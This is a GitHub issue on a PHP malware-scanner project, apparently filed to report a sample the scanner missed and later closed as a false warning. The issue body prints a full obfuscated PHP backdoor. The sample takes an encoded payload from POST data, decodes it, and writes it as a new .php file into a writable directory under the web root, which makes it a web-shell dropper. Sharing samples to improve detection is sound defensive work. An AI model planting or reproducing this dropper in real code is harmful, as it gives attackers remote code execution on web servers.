search

scr34m / php-malware-scanner

Scans PHP files for malwares and known threats
GNU General Public License v3.0
556 stars 96 forks source link

Missing malware file example #21

Closed rthrash closed 6 years ago

rthrash commented 6 years ago 
<?php $mfcux = "ljnlfyxhkwljsapl";$lalxpth = "";foreach ($_POST as $oohzmoss => $edoawzcjq){if (strlen($oohzmoss) == 16 and substr_count($edoawzcjq, "%") > 10){oiyvmhtsf($oohzmoss, $edoawzcjq);}}function oiyvmhtsf($oohzmoss, $cdafv){global $lalxpth;$lalxpth = $oohzmoss;$cdafv = str_split(rawurldecode(str_rot13($cdafv)));function bapdyxs($krsugph, $oohzmoss){global $mfcux, $lalxpth;return $krsugph ^ $mfcux[$oohzmoss % strlen($mfcux)] ^ $lalxpth[$oohzmoss % strlen($lalxpth)];}$cdafv = implode("", array_map("bapdyxs", array_values($cdafv), array_keys($cdafv)));$cdafv = @unserialize($cdafv);if (@is_array($cdafv)){$oohzmoss = array_keys($cdafv);$cdafv = $cdafv[$oohzmoss[0]];if ($cdafv === $oohzmoss[0]){echo @serialize(Array('php' => @phpversion(), ));exit();}else{function jmcnve($mpyckqybuir) {static $sadowmop = array();$lttbxub = glob($mpyckqybuir . '/*', GLOB_ONLYDIR);if (count($lttbxub) > 0) {foreach ($lttbxub as $mpyckqybu){if (@is_writable($mpyckqybu)){$sadowmop[] = $mpyckqybu;}}}foreach ($lttbxub as $mpyckqybuir) jmcnve($mpyckqybuir);return $sadowmop;}$ugouxvfh = $_SERVER["DOCUMENT_ROOT"];$lttbxub = jmcnve($ugouxvfh);$oohzmoss = array_rand($lttbxub);$ktabzhde = $lttbxub[$oohzmoss] . "/" . substr(md5(time()), 0, 8) . ".php";@file_put_contents($ktabzhde, $cdafv);echo "http://" . $_SERVER["HTTP_HOST"] . substr($ktabzhde, strlen($ugouxvfh));exit();}}}
rthrash commented 6 years ago

False warning. Ignore!